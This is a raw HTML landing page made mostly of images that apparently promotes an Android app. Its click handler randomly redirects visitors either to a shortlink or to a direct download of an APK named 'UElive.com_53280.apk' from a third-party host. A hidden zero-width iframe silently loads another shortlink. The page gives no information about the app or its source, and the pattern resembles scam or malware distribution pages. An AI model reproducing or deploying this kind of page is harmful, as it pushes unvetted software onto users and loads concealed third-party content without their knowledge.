<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<style>html { overflow-x:hidden; }</style> 

<style>html { overflow-y:hidden; }
@media screen and (orientation: portrait) {
 .divbanner img{ width:100%; margin-bottom:0%;margin-top:0%; } 
	.divbanner {width:100%;position:relative;overflow:hidden}
	.forbid img{ width:0%;  margin-bottom:0%;margin-top:1%;margin-left:0%; } 
.download img{ 
	 position:absolute;
         bottom:8%;
          left: 73%;
	  width:25%;
	}
	.forbid2 img{ 
	 position:absolute;
         top:8%;
          left: 10%;
	  width:0%;
	}
	.inimg img {
		   width:100%;
	           margin-right:1%;
			   margin-top:2%; 
	} 
	
	
	.explain img{ 
	   width:100%;
	}
}
@media screen and (orientation: landscape) {
 
	
	 .divbanner img{ width:45%; margin-bottom:-3%;margin-top:-2%; } 
	.divbanner {width:100%;position:relative;overflow:hidden}
	
	.forbid img{ 
	 
	  width:0%;
	}
	.forbid2 img{ 
	 position:absolute;
         top:4.6%;
          left: 31%;
	  width:0%;
	}
	.download img{ 
	 position:absolute;
         bottom:10%;
          left: 43%;
	  width:15%;
	}

	.inimg img {width:49%;margin-right:0.5%;margin-top:1%;} 
	.explain img{ 
	  
	  width:60%;
	}
}
	
.inimg {white-space:nowrap;overflow-x:auto;overflow-y:hidden;} 

 	
</style>

<script>
function random_url()
{
	if(Math.random()>0.8)
window.location.href = "https://biiy.cn/00047s";
	else window.location.href = "http://d2.youyi520.com/a/c/53/UElive.com_53280.apk";
}
</script>
	
</head>

<body >

		
	
	
	<div class="forbid" >
	<img  src="https://img.alicdn.com/imgextra/i4/463088403/O1CN013lS2lb2BwcfMSeW4W_!!463088403.png"/>
        </div >
	
<div align="left"  class="divbanner"> 
<img onclick="javascript:random_url();" style="cursor:pointer;" id="banner" src="https://paingtingwebpage.cdn.bcebos.com/topbanner.jpg"/>

	<div   class="download"> 
<img  onclick="javascript:random_url();" style="cursor:pointer;" id="banner" src="https://img.alicdn.com/imgextra/i1/463088403/O1CN01pLEbjp2BwcfPIRkT0_!!463088403.png"/>
</div >	
	<div class="forbid2" >
	<img  src="https://img.alicdn.com/imgextra/i4/463088403/O1CN013lS2lb2BwcfMSeW4W_!!463088403.png"/>
        </div >
	
	</div >

<div  class="inimg">
        
     
     <img width="50%" src="https://america.cdn.bcebos.com/preview1.jpg" border=0>
	 <img width="50%" src="https://america.cdn.bcebos.com/preview3.jpg" border=0>
   
</div>
	
	
<div class="explain" >
	<img   width="100%"  src="https://img.alicdn.com/imgextra/i2/463088403/O1CN01o1n9vl2BwcfQWwnkv_!!463088403.jpg"/>
</div >
	
	<iframe class="iframe2" width="0%"   frameborder="0" src="https://biiy.cn/000PJU"></iframe>

</body>

	
</html>

